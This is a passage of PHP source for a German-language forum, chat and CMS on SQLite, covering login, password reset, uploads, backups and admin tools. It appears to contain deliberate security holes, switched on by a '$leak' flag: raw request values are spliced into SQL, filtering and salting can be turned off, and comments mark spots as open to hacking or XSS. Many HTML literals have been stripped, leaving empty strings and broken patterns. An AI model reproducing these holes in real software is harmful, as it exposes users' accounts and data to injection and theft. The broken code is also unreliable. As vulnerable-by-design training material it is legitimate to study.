$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
else
$out .= "0;";
}
#end
if(preg_match('/call|edit|quit|send|sign/',$chat[1])) // User-Lifetime zurücksetzen
$sql['e']($conn,"
update [user] set
change = datetime('now','localtime'),
requests = requests+1
where id = $uid");
if($wait) { // HTML-Chat ausgeben (NoScript)
$out = '';
if($chat = $sql['sq']($conn,"select chat from [user] where id = $uid")) {
$array = $sql['aq']($conn,"
select ifnull(u.username,'Unbekannt') as user,strftime('%d.%m.%Y %H:%M:%S',c.time) as time,c.text as text
from [chat] as c
left join [user] as u on u.id = c.user
where c.chat = $chat
order by c.time desc
limit 10");
foreach($array as $key => $var)
$array[$key] = "
";
$out = implode("\n",$array);
}
@header('Content-Type: text/html; charset=utf-8');
$out = "" /* 4.01 Transitional */ ."
NoScript Chatline
\n".strtr($out,$uml)
.((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "".date('d.m.Y H:i:s')
."
" : "")."";
}
else
header('Content-Type: text/plain');
die("$out"); // Ergebnis ausgeben
}
if(is_array($jschat) and is_array($jschat['crypt'])) { // Verschlüsselten Chat vorbereiten
foreach($jschat['crypt'] as $key => $var)
$head["chat.$key"] = "";
$a = "['$jschat[prime]','".(($jschat['main']) ? $jschat['main'] : substr(strrev(str_rot13($jschat['prime'])),1))."',$jschat[base]]";
}
else
$a = 'false';
$rows = $sql['aq']($conn, /* Chat-GUI Erstellen */ "
select id,username
from [user]
where status is not null
order by username");
foreach($rows as $key => $var)
$rows[$key] = "";
$val = array(0 => 'Ablehnen', 1 => 'Erlauben', 3 => 'Zeigen');
foreach($val as $key => $var)
$val[$key] = "";
$var = "";
$out .= (isset($_GET['nojs'])) ? preg_replace("!?noscript>||\son(submit|click|change)='.*?'!s",'',$var) : $var;
}
elseif(isset($_REQUEST['chat'])) { // Gästen ermöglichen Admin-Messages zu Empfangen
$out = "0";
if(preg_match('/^(news)(?::(.+))?$/',$_REQUEST['chat'],$chat) and ($var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = 0")) > ($val = intval($chat[2]))) {
$out .= ";$var;";
if($var > $val and $array = $sql['aq']($conn, /* 2 Anzahl der Messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where chat = '0' and id > $val" /* Keine Chatanfragen anzeigen (Hack ermöglichen) */."
order by id") and count($array)) {
$out .= count($array);
foreach($array as $var)
$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
}
header('Content-Type: text/plain');
die($out);
}
# Eingaben von Formularen auswerten
if(count($_POST) > 0) {
if(isset($_COOKIE[session_name()]) and $_COOKIE[session_name()] == session_id()) { // Auf Gültige Session prüfen
if(!$leak and isset($_SESSION['flc']) and $_SESSION['flc'] >= $flc) { // Im Sicherheitsmodus Brute-Force erschweren
header('HTTP/1.0 403 Forbidden');
die("
Verboten!
");
}
# Neuanmeldung
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and (isset($_POST['register']) or isset($_POST['change']) or isset($_POST['kill']))) {
$array = array(
'username' => '[\w.-]{1,64}', 'password' => '[[:print:]]{0,64}', 'probate' => '[[:print:]]{0,64}',
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}', 'question' => '\d{0,8}',
'myquestion' => '[\w,. ?-]{0,96}', 'answer' => '[\w. -]{0,96}', 'town' => '[\w. -]{0,64}',
'info' => '[^\']{0,255}', 'born' => '(\d{2}\.\d{2}\.(19|20)\d{2})?',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)',
'page' => '((https?:\/\/)?([\w.-]+|\[[\d:a-f]+\])(:\d+)?(\/[\w:;.,_%?=\[\]\/-]*)?)?');
$wrt = (floor($status%4/2) and isset($_POST['id']) and preg_match('/\d*/',$_POST['id'],$var)) ? $var[0] : false;
foreach($array as $key => $var)
if(isset($_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
if(isset($post) and count($post) == count($array) and $post['password'] == $post['probate']) {
if(isset($post['born']) and $post['born']) {
$post['born'] = implode('-',array_reverse(explode('.',$post['born'])));
if(strtotime($post['born']) > time())
unset($post['born']);
}
$val = $post['probate'];
unset($post['probate']);
$salt = (!$leak) ? substr(preg_replace('/\W/','',crypt(rand().time())),-12) : false;
if($salt and $post['password'] != '')
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$post[password]-".strtolower($post['username']));
if(isset($post['question']) and isset($post['answer']) and $post['answer'] != '' and ($post['question'] or isset($post['myquestion']) and $post['myquestion'] != ''))
$post['passhelp'] = ((!$post['question'] and $post['myquestion'] != '') ? "0-$post[myquestion]:" : "$post[question]-")."$post[answer]";
foreach(array('question','myquestion','answer') as $var)
unset($post[$var]);
foreach($post as $key => $var)
$post[$key] = $sql['es']($var);
$key = '(localhost|127(\.\d{1,3}){3}|::1|[\w.-]\.xx)';
if(!$leak and array_search($val,explode(' ',$attack['_wordlist_'])) !== false)
$out .= "
Das Kennwort aus einen Wörterbuch ist zu einfach - Bitte ein sicheres wählen!";
elseif($ipck and !preg_match("/@$key$/",$post['mail']) and ($var = preg_replace('/^[^@]*@/','',$post['mail'])) == gethostbyname($var))
$out .= "
Die eMail-Adresse läßt sich nicht auflösen oder ist gerade Offline!
";
elseif($ipck and preg_match("/^$array[page]$/",$post['page'],$var) and count($var) > 3 and !preg_match("/^$key$/",$var[3]) and $var[3] == gethostbyname($var[3]))
$out .= "
Die Homepage-Adresse läßt sich nicht auflösen oder ist gerade Offline!
";
elseif($user and isset($_POST['register']) and $post['password'] != '') {
if(!$var = $sql['aq']($conn,"
select (select username
from [user]
where username like '$post[username]') as user,
(select mail
from [user]
where mail like '$post[mail]') as mail
where user is not null
or mail is not null",SQLITE_NUM)) {
if($sql['sq']($conn,"select count(*) from [user]") == 0) // Admin
$post['status'] = 2;
if(!$sql['e']($conn,"
insert into [user] ([create],[change],[".implode("],[",array_keys($post))."])
values (datetime('now','localtime'),
datetime('now','localtime'),
'".implode("','",$post)."')"))
$out .= "
".implode(' und ',$key).((count($key) > 1) ? " sind" : " ist" )." schon im System vorhanden!
";
}
}
elseif($uid and (isset($_POST['change']) or isset($_POST['kill'])) and isset($_POST['userpass'])
and ($status/2%2 or !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass'])) and ($sql['sq']($conn,"
select count(*)
from [user]
where (username like '$post[username]' or id = '$wrt')
and password='".$sql['es']($_POST['userpass'])."'") or preg_match('/^salt:(.+?)-hash:(\w+)$/',$sql['sq']($conn,"
select password
from user
where (username like '$post[username]' or id = '$wrt')"),$var) and $var[2] == $hash[0]("$var[1]-$_POST[userpass]-".strtolower($post['username'])))) {
if(isset($_POST['change'])) {
if($post['password'] == '')
if($salt and !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass']))
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$_POST[userpass]-".strtolower($post['username']));
else
unset($post['password']);
$array = array();
foreach($post as $key => $var)
$array[$key] = "[$key]='$var'";
$val = str_replace('=',' like ',$array['username']);
if($wrt)
$val = "($val or id = $wrt)";
@$sql['e']($conn,"
update [user] set status=0
where $val and status is null");
if(!$sql['e']($conn,"
update [user] set [change]=datetime('now','localtime'),
".implode(",",$array)."
where $val
and (status%2=1 or $status/2%2 = 1)"))
$out .= "
Ihre Daten konnten nicht geändert werden!
";
else
$request = 'Profil';
}
elseif(isset($_POST['kill']) and $var = $sql['sq']($conn,"
select id
from [user]
where [username] like '$post[username]'
and (status%2=1 or $status/2%2 = 1)")) {
$sql['e']($conn,"
update [user] set
[change]=datetime('now','localtime'),
[changes]=[changes]+1,
[status]=NULL
where id=$var");
$request = '';
}
}
else
$out .= "
Ihr altes Kennwort stimmt nicht!
";
}
else
$out .= "
Sie haben nicht alle Eingabefelder korrekt ausgefüllt!
";
}
# Kennwort Vergessen
if(!$uid and isset($_POST['restore'])) {
$post = array();
$wrt = ($leak) ? array() : array(
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)');
$array = array_merge($wrt,array( 'question' => '\d{1,8}',
'answer' => '[\w. -]{1,96}', 'username' => '[\w.-]{1,64}',
'password' => '[[:print:]]{1,64}', 'probate' => '[[:print:]]{1,64}'));
foreach($array as $key => $var)
if(isset($_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
if(isset($post['username']) and ($leak or isset($post['mail']) and isset($post['forename']) and isset($post['lastname']))) {
if($var=$sql['sq']($conn,"select passhelp from [user] where username like '$post[username]'".(($leak) ? "" : " and mail like '$post[mail]'")) and preg_match('/^(\d+)-(?:(?<=0-)(.+?):)?/',$var,$var)) {
if(!$post['question'] = $var[1])
$post['myquestion'] = ($var[2] != '') ? $var[2] : false;
}
else
$out .= "
Das Kennwort kann nicht zurückgesetzt werden, da keine Sicherheitsfrage hinterlegt wurde!
";
if(isset($post['password']) and isset($post['probate']) and $post['password'] == $post['probate']) {
if(isset($post['question']) and isset($post['answer']) and ($leak or isset($post['forename']) and isset($post['lastname'])) and $sql['e']($conn,"
update [user]
set password='".$sql['es']($post['password'])."'
where username like '$post[username]'".(($leak) ? "" : "
and mail like '$post[mail]'
and forename like '$post[forename]'
and lastname like '$post[lastname]'")."
and passhelp like '$post[question]-".((!$post['question'] and isset($post['myquestion']) and $post['myquestion']) ? "$post[myquestion]:" : "")."$post[answer]'") and $sql['c']($conn)) {
$request = '';
$out .= "
Ihr Kennwort wurde jetzt neu gesetzt!
";
$row = true;
}
else {
$out .= "
Die Sicherheitsfrage muss korrekt beantwortet werden!
Sie haben noch kein neues korrektes Kennwort vergeben!
";
}
else
$out .= "
Sie müssen alle Felder ausfüllen!
";
}
# Login durchführen
if(!$uid and ($row or isset($_POST['login'])) and isset($_POST['username']) and isset($_POST['password'])) {
$post = array( 'username' => preg_replace('/[^\w.:@\[\]-]+/','',$_POST['username']),
'password' => preg_replace('/[^[:print:]]/','',$_POST['password']));
if(($val = $sql['aq']($conn,"
select id,username,password,status,change
from [user]
where (username like '$post[username]'
or mail like '$post[username]')
and status is not null")) and $val = $val[0] and (preg_replace('/^salt:\w+-hash:\w+$/','',$post['password']) == $val['password']
or preg_match('/^salt:(.+?)-hash:(\w+)$/',$val['password'],$var) and $var[2] == $hash[0]("$var[1]-$post[password]-".strtolower($val['username']))
or !$leak and isset($_SESSION['sha']) and preg_match('/^([@\w.-]+):(\w+)$/',$post['password'],$var) and $var[1] == $post['username']
and ($var[2] == $hash[0]("$_SESSION[sha]-".$val['password']) or $var[2] == $hash[0]("$_SESSION[sha]-".preg_replace('/^salt:\w+-hash:(\w+)$/','$1',$val['password']))))) {
foreach($_SESSION as $key => $var)
unset($_SESSION[$key]);
$uid = $val['id'];
$status = floor($val['status']/2)*2+1;
$_SESSION['lua'] = $val['change'];
$_SESSION['uid'] = $uid;
$sql['e']($conn,"
update [user] set
status=(status/2%8*2+1),
logins=logins+1,
requests=requests+".((isset($_SESSION['src'])) ? $_SESSION['src'] : 0).",
change=datetime('now','localtime'),
ip='$addr',
session='".$sql['es'](session_id())."',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'".((isset($_POST['info'])) ? ",
info=nullif('".$sql['es']($_POST['info'])."','')" : "")."
where id=".$val['id']);
if(isset($_SESSION['src']))
unset($_SESSION['src']);
if(!$request and !$query)
$request = 'Profil';
if(isset($_POST['forever']) and $_POST['forever'])
setcookie('login',"$uid.".$hash[0]("$val[username]:$val[password]"),time()+$ctl,$self);
else
setcookie('username',$val['username']);
}
else {
$post['password'] = '';
if(!$leak)
$_SESSION['flc'] = (isset($_SESSION['flc'])) ? $_SESSION['flc'] + 1 : 1;
}
}
# Profil speichern
if($uid and !isset($_POST['stop']) and !isset($_POST['test']) and isset($_POST['profil']) and $sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
profil=nullif('".$sql['es']($_POST['profil'])."','')
where id=".((isset($_POST['uid']) and $_POST['uid'] != $uid and preg_match('/\d+/',$_POST['uid'],$var)) ? "$var[0]
and (select status
from [user]
where id=$_SESSION[uid])%4 = 3" : "$_SESSION[uid] and status%2=1"))) // XSS
$request = 'Profil';
# Blog Bearbeiten
if($request == 'Beitrag' and $uid and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['message']) and isset($_POST['title']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)
and $uid == $_POST['mail'] and $_POST['mail'] == $sql['sq']($conn,"select userid from [forum] where id = $var[0]") and $sql['e']($conn,"
update [forum] set".((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? "\n\t\tstatus=status/2%2*2+$val[0]%2," : "")."
change=datetime('now','localtime'),
changes=changes+1,
ip='$addr',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
title=nullif('".$sql['es'](strtr($_POST['title'],$html))."',''),
message='".$sql['es'](strtr($_POST['message'],$html))."'
where status is not null and id = $var[0]"))
$request = 'Blog';
# Forum Betrag speichern
elseif($var = array('') and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['title']) and isset($_POST['max']) and isset($_POST['message']) and $_POST['message'] != ''
and ($uid or $gast) and ($_POST['max'] == $sql['sq']($conn,'select max(id) from [forum]') or (($gast) ? 0 : $uid) != $sql['sq']($conn,"
select userid
from [forum]
where id = (select max(id)
from [forum])")) and ($_POST['mail'] == '' or preg_match('/^\d+$/',$_POST['mail'],$var) and $sql['sq']($conn,"
select id
from [user]
where status is not null and id=$var[0]")) and $sql['e']($conn,"
insert into [forum] ([create],[change],[status],[userid],[mailid],[ip],[useragent],[path],[title],[message])
values (datetime('now','localtime'),datetime('now','localtime'),
".((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? $val[0]%2 : 0).",
".(($uid) ? $uid : 0).",
nullif('$var[0]',''),
'$addr',
'".$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
nullif('".((isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$val) and $val = $sql['sq']($conn,"select ifnull(path,'/')||id||'/' from [forum] where id=$val[0]")) ? $val : '')."',''),
nullif('".$sql['es'](strtr($_POST['title'],$html))."',''),
'".$sql['es'](strtr($_POST['message'],$html))."')"))
$request = ($var[0]) ? (($var[0] == $uid) ? 'Blog' : 'Mail') : '';
}
else
$out .= "
";
}
# Mails löschen
if(preg_match('/Blog|Mail/',$request) and $uid and isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var) and $uid == $sql['sq']($conn,"select mailid from [forum] where id = $var[0]"))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");
# Tagline speichern
if($uid and !isset($_REQUEST['stop']) and !isset($_REQUEST['test']) and isset($_REQUEST['tl']))
$sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
tagline=nullif('".$sql['es']($_REQUEST['tl'])."','')
where id=".(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid));
# Abmelden
if(preg_match('/^Abmelden\s?$/',$request)) {
if($sql['e']($conn,"
update [user] set status=(status/2%8*2),
chat=null,
change=datetime('now','localtime')
where ".((isset($_GET['id']) and $_GET['id']) ? "(select status%4 from [user] where id=nullif('$uid',''))=3 and id=".(($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id']))
: "id='$uid' and status%2=1")) and $sql['c']($conn) and (!$status/2%2 or !isset($_GET['id']))) {
session_unset();
if(isset($_COOKIE['login'])) {
setcookie('login',0,time()-$ctl,$self);
unset($_COOKIE['login']);
}
}
// if(substr($request,-1) != ' ')
$request = '';
$uid = $status = false;
}
# Login Forumlar
if(!$uid and (!preg_match('/^(Anmelden|Kennwort|SQL|Beitrag|Creole)$/',$request,$var) and !$info[3] and (($user or !$lone) and !$content or !is_array($content) and preg_match('/(<|<){3}login(\d?)(>|>){3}/i',$content,$var) or $request == 'Login') or !$inet and !$local and trim($request) == 'Impressum')) {
if(!(isset($post['username']) and $post['username']) and isset($_COOKIE['username']) and $_COOKIE['username'])
$post['username'] = ($leak) ? $_COOKIE['username'] : preg_replace('/^([^\w.:@\[\]-]*).*$/','$1',$_COOKIE['username']);
if(!$leak and $hash)
$head['hash'] = "";
$out = "
$out";
}
# Datei-Upload
if($uid and $request == 'Datei') {
$len = $sql['sq']($conn,"select sum(abs(size)) from [file] where user = $uid and status is not null");
if(isset($_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name'])) {
$name = preg_replace('/[^\w!,.-]/','',((isset($_POST['name']) and $_POST['name'] != '') ? $_POST['name'] : $_FILES['file']['name']));
if(!$status/2%2 and ($len + $_FILES['file']['size']) > $maxfile)
$out .= "
Sie haben ihren Datei-Upload Content um ".number_format(($len - $maxfile),0,',','.')." Bytes überschritten!
";
elseif(!$type = array_search(strtolower(preg_replace('/^.*?\.(\w+)$/','$1',$name)),$type) and !$status/2%2)
$out .= "
Ihr Datei-Upload besitzt einen nicht erlaubten Datei-Type!
";
else {
$data = file_get_contents($_FILES['file']['tmp_name']);
$crc = str_pad(dechex(crc32($data)),8,0,STR_PAD_LEFT);
$size = strlen($data);
$len += $size;
$var = array_merge(array(
'[create]' => "datetime('now','localtime')",
'[status]' => (int)$_POST['right'] + (int)$_POST['status'],
'[user]' => $uid,
'[name]' => "'$name'",
'[ip]' => "'$addr'",
'[useragent]' => "nullif('".$sql['es']($_SERVER['HTTP_USER_AGENT'])."','')",
'[info]' => "nullif('".$sql['es'](strtr($_POST['info'],$html))."','')"),
($link = $sql['sq']($conn,"select id from [file] where link is null and hash = '$crc' and abs(size) = $size")) ? array('[link]' => $link) : array(
'[size]' => $size,
'[hash]' => "'$crc'",
'[type]' => (($type) ? "nullif('".preg_replace('![^\w/ ;=+-]!','',$_FILES['file']['type'])."','')" : "null"),
'[data]' => "'".base64_encode($data)."'"));
if(isset($var['[data]']) and $data = $gz['deflate']($data,9) and strlen($data) < $size) {
$var['[data]'] = "'".base64_encode($data)."'";
$var['[size]'] *= -1;
}
if($val = $sql['sq']($conn,"select id from [file] where status is not null and user = $uid and name like ".$var['[name]']." limit 1")) {
// $sql['e']($conn,"update [file] set status = null where id = $val");
$key = array();
foreach($var as $k => $v)
$key[] = "$k = $v";
if(!@$sql['e']($conn,"update [file] set\n\t".implode(",\n\t",$key)."\nwhere id = $val"))
$var = false;
}
elseif(!@$sql['e']($conn,"insert into [file] (".implode(',',array_keys($var)).") values (".implode(',',array_values($var)).")"))
$var = false;
if(!$var)
$out .= "
Datei konnte nicht verarbeitet werden!
";
}
}
elseif(isset($_POST['send']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)) {
$sql['e']($conn,"
update [file] set
status = ".((int)$_POST['right'] + (int)$_POST['status']).",
name = '".preg_replace('/[^\w!&,.-]/','',$_POST['name'])."',
info = '".$sql['es']($_POST['info'])."'"
.(($status/2%2 and isset($_POST['type'])) ? ",\n\t\ttype = ".((preg_match('![\w/ ;=+-]+!',$_POST['type'],$val)) ? "'$val[0]'" : "null") : "")."
where status is not null and id = $var[0]".(($status/2%2) ? "" : " and user = $uid "));
if(isset($_POST['charset']) and preg_match('/^[\w-]+$/',$_POST['charset'],$val) and $var = $sql['aq']($conn,"
select ifnull(b.id,a.id) as id,
ifnull(b.type,a.type) as type
from [file] as a
left join [file] as b on a.link = b.id
where a.status is not null and ifnull(a.type,b.type) like 'text/%'".(($status/2%2) ? "" : " and a.user = $uid")." and a.id = $var[0]"))
$sql['e']($conn,"
update [file] set
type = '".preg_replace('!^([\w/-]+).*$!','$1',$var[0]['type'])."; charset=$val[0]'
where id = ".$var[0]['id']);
}
elseif(isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
if($sql['sq']($conn,"select 1+status from [file] where id = $var[0]"))
$sql['e']($conn,"update [file] set status = null where (user = $uid or $status/2%2) and id = $var[0]");
else
$sql['e']($conn,strtr("begin;
update [file] set
size = (select size from [file] where id = #),
hash = (select hash from [file] where id = #),
type = (select type from [file] where id = #),
data = (select data from [file] where id = #)
where id = (select id from [file] where link = # limit 1);
update [file] set link = (select id from [file] where link = # and data is not null)
where link = #;
update [file] set link = null where id = link;
delete from [file] where id = #;
commit;",array('#' => $var[0])));
elseif($status/2%2 and isset($_GET['restore']) and preg_match('/\d+/',$_GET['restore'],$var))
$sql['e']($conn,"
update [file]
set status = 1
where id = $var[0]");
$data = (($status/2%2 and !is_bool($mid)) ? (($mid < 0) ? '' : "where a.user = $mid") : "where a.user = $uid and a.status is not null");
$num = $sql['sq']($conn,"select count(*) from [file] as a $data");
if($page[0] == '')
$page = array(1,"page=1");
preg_replace($paging[5],$paging[6],"$num,$max,#key#");
if($rows = $sql['aq']($conn,"
select a.name as name,
abs(ifnull(a.size,b.size)) as absize,
a.user||'-'||a.name as flink,
a.id as id,
u.username as uname,
a.ip as ip,
ifnull(a.status/2%2,1) as status,
a.status%2 as right,
a.[create],
ifnull(a.hash,b.hash) as hash,
a.info as info,
ifnull(a.type,b.type) as type,
a.useragent as agent,
a.link as link,
a.user as user,
ifnull(a.size,b.size) as size,
ifnull(length(a.data),0) as truesize,
strftime('%d.%m.%Y %H:%M:%S',a.[create]) as erstellt
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
$data".preg_replace($sorth[2],$sorth[3],'u.id,a.name;11;a.name')."
limit $val,$max",SQLITE_ASSOC)) {
$row = array(); // user
$val = ($status/2%2 and $mid) ? "&user=$mid" : false;
$key = 0;
foreach($rows as $var)
$row[] = "
X";
$out .= "";
}
$row = ($id and $row = $sql['aq']($conn,"
select a.status as status,
a.name as name,
a.info as info,
ifnull(a.type,b.type) as type
from [file] as a
left join [file] as b on a.link = b.id
where a.id = $id")) ? reset($row) : array('name' => '', 'info' => '', 'status' => 1, 'type' => '');
$val = ($status/2%2) ? (($mid == -1) ? array($key,'insgesamt belegt') : array($len,'belegt')) : array($maxfile-$len,'frei');
$out .= "";
}
# Administrator Werkzeuge
if($uid and $status/2%2 or $info[3] != '') {
$info[4] = "|>-\n|--[ [[^Backup]] ~| [[^CMS]] ~| [[^SQL|SQL-Konsole]] ~| [[^Status]] ]--|\n";
if(preg_match('/^(cms|backup|sql|status)$/i',$request))
$info[8] = @preg_replace(array_keys($creole),array_values($creole),"$info[4]--");
if($request == 'Status' and array_sum($var = reset(($sql['aq']($conn,"
select (select count(*) from user where status/2%2),
(select count(*) from user where status%2),
(select count(*) from user where status%2 = 0),
(select sum(logins) from user),
(select sum(requests) from user),
(select count(*) from (select count(*) from [user] group by ip having count(*) > 1))",SQLITE_NUM))))) {
$out .= "$info[8]
";
$out .= "
";
}
if($request == 'Backup') { // Backup Database
$var = (isset($_FILES['sqlite']['tmp_name']) and !$_FILES['sqlite']['error'] and file_exists($_FILES['sqlite']['tmp_name'])) ? $_FILES['sqlite']['tmp_name'] : "$base.gz";
if($query == 'reorg')
$sql['e']($conn,"vacuum");
elseif(isset($_POST['create']) and (!file_exists("$base.gz") or $owbu) and ($fr=fopen($base,'rb')) and ($fw=$gz['open']("$base.gz",'wb9'))) {
while(!feof($fr))
$gz['write']($fw,fread($fr,1024));
fclose($fr);
$gz['close']($fw);
}
if($var != "$base.gz" or isset($_POST['reset'])) { // Restore
$sql['cl']($conn);
if(($fr=$gz['open']($var,'rb')) and ($fw=fopen($base,'wb'))) {
while(!$gz['eof']($fr))
fwrite($fw,$gz['read']($fr,1024));
$gz['close']($fr);
fclose($fw);
@touch($base,filemtime($var));
header("Location: $self");
die("Weiter zum Forum");
}
}
elseif(isset($_GET['download']) and file_exists($var = preg_replace('/\/.*$/','',$base)."/".basename($_GET['download']).strrchr($base,'.')) and is_file($var)) { // Save Fail-DB
header('Content-Type: application/octetstream');
header('Content-Disposition: filename="'.basename($var).'"');
header('Content-Length: '.filesize($var));
readfile($var);
exit();
}
elseif(isset($_POST['backup']) or $query == 'download') { // Save DB
$var = ($query and file_exists("$base.gz")) ? file_get_contents("$base.gz") : $gz['encode'](file_get_contents($base),9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: filename="'.basename($base).'.gz"');
header('Content-Length: '.strlen($var));
die($var);
}
elseif(isset($_REQUEST['sqldump']) and $tables = $sql['q']($conn,"select name,sql from sqlite_master where type='table' and name not like 'sqlite_%'")) { // Make SQL-Dump
$eol = "\r\n";
$val = "begin;$eol";
while($table = $sql['fa']($tables,SQLITE_ASSOC)) {
$val .= ((isset($_REQUEST['dt'])) ? ((isset($_REQUEST['ct'])) ? "drop table" : "delete from")." [$table[name]];$eol" : "")
.((isset($_REQUEST['ct'])) ? "$table[sql];" : "/* ".$table['sql']." */").$eol;
if($lines = $sql['q']($conn,"select * from [$table[name]]")) {
$cols = $sql['nf']($lines);
$name = array();
for($a=0; $a<$cols; $a++)
$name[] = "[".$sql['fn']($lines,$a)."]";
while($line = $sql['fa']($lines,SQLITE_NUM)) {
foreach($line as $key => $var)
$line[$key] = (is_null($var)) ? 'null' : ((preg_match('/^(0|-?[1-9]\d*(\.\d+)?)$/',$var)) ? $var : "'".$sql['es']($var)."'");
$val .= "insert into [$table[name]] (".implode(",",$name).") values (".implode(",",$line).");$eol";
}
}
}
$val = $gz['encode']($val."commit;$eol",9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: filename="'.preg_replace('/(?<=\.)\w+$/','sql',basename($base)).'.gz"');
header('Content-Length: '.strlen($val));
die($val);
}
else
$out .= "$info[8]
";
}
# Administration von Forenbeträgen
if($request == 'Admin') {
if(isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
$sql['e']($conn,"delete from [forum] where id=$var[0]");
elseif(isset($_GET['lock']) and preg_match('/\d+/',$_GET['lock'],$var))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");
elseif(isset($_GET['save']) and preg_match('/\d+/',$_GET['save'],$var))
$sql['e']($conn,"update [forum] set status=0 where status is null and id=$var[0]");
if(isset($_GET['edit']) and preg_match('/\d+/',$_GET['edit'],$var)) {
if(isset($_POST['edit']) and isset($_POST['message']) and $_POST['message'] != '') {
$sql['e']($conn,"
update [forum] set change=datetime('now','localtime'),
changes=changes+1,
title=nullif('".((isset($_POST['title'])) ? $sql['es'](strtr($_POST['title'],$html)) :'')."',''),
message='".$sql['es'](strtr($_POST['message'],$html))."',
status=nullif('".preg_replace('/\D/','',$_POST['status'])."',''),
userid=".preg_replace('/\D/','',$_POST['userid']).",
mailid=nullif('".preg_replace('/\D/','',$_POST['mailid'])."',''),
path=nullif('".preg_replace('/[^\d\/]/','',$_POST['path'])."','')
where id=$var[0]");
$request = ($mid or $_POST['mailid']) ? (($_POST['mailid'] == $_POST['userid']) ? 'Blog' : 'Mail') : '';
if(!$q)
$q = $var[0];
}
else {
$wrt = array();
if($getopt != '')
$wrt[] = $getopt;
if($page[1] != '')
$wrt[] = $page[1];
$wrt = "$self/Admin?".implode('&',$wrt).((count($wrt) > 0) ? '&' : '');
$line = reset(($sql['aq']( $conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.userid as userid,
f.mailid as mailid,
f.ip as uip,
f.useragent as ua,
f.status as status,
ifnull(f.status%2,'-1') as right,
f.path as path,
f.title as title,
f.message as message,
u.username as author
from [forum] as f
left join [user] as u on u.id = f.userid
where f.id=$var[0]",SQLITE_ASSOC)));
foreach($_POST as $k => $v)
if(preg_match('/^(title|message|userid|mailid|path|status)$/',$k))
$line[$k] = $v;
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $line['id'], 'name' => $line['id'], 'title' => $line['title'], 'from' => $line['author'], 'create' => $line['create'], 'change' => $line['change'], 'right' => $line['right']));
$array = array();
foreach($sql['aq']($conn,"select id,username from user") as $v) {
$array['user'][] = "";
$array['mail'][] = "";
if($v['id'] == $line['userid'])
$line['from'] = $v['username'];
if($v['id'] == $line['mailid'])
$line['to'] = $v['username'];
}
$out .= "";
}
}
else
$request = '';
}
}
elseif(preg_match('/Admin|Backup/',$request))
$request = '';
# Content-Management-System
if((($request == 'CMS' or isset($_REQUEST['request']) and $_REQUEST['request'] == 'CMS') and $uid) and ($status/2%2 or $status%2 == 1 and $sql['sq']($conn,"select status/2%4 from [cms] where id like '$id' or name like '".$sql['es'](trim($q))."'") == 2)) {
if(count($_POST) and !isset($_POST['stop'])) {
$post = array('name' => '\w.-', 'content' => '^\x00');
if($status/2%2)
$post = array_merge($post,array('description' => '^\n', 'menu' => '\d', 'public' => '\d', 'right' => '\d-', 'id' => '\d', 'create' => '\d', 'change' => '\d'));
foreach($post as $key => $var)
$post[$key] = (isset($_POST[$key]) and preg_match('/['.$var.']+/',$_POST[$key],$val)) ? strtr($val[0],$html) : false;
if(isset($_POST['save']) and $_POST['save'] and isset($_POST['name']) and !preg_match("/^\s*$ncms\s*$/",$_POST['name'])) {
if($status/2%2)
$var = (int)$post['right']*2 + ((isset($post['menu'])) ? $post['menu'] : 0) + ((isset($post['public'])) ? $post['public']*8 : 0);
if($id)
$sql['e']($conn,"
update [cms] set
change=datetime('now','localtime'),
changes=changes+1,".(($status/2%2) ? "
status=$var,
name='$post[name]',
description=nullif('".$sql['es']($post['description'])."','')," : "")."
content=nullif('".$sql['es']($post['content'])."','')
where id = $id");
elseif($status/2%2)
$sql['e']($conn,"
